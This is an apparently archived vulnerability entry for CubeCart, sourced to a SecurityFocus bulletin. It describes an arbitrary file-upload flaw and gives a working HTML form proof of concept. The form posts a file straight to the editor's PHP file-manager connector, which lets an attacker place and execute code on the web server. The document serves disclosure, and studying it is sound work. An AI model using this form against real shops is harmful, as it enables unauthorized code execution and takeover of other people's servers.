14 lines
No EOL
678 B
HTML
14 lines
No EOL
678 B
HTML
source: https://www.securityfocus.com/bid/16796/info
|
|
|
|
CubeCart is prone to an arbitrary file-upload vulnerability.
|
|
|
|
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
|
|
|
<form action="http://www.example.com/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFol
|
|
der=/"
|
|
method="POST" enctype="multipart/form-data">
|
|
File Upload<br>
|
|
<input id="txtFileUpload" type="file" name="NewFile">
|
|
<br>
|
|
<input type="submit" value="Upload">
|
|
</form> |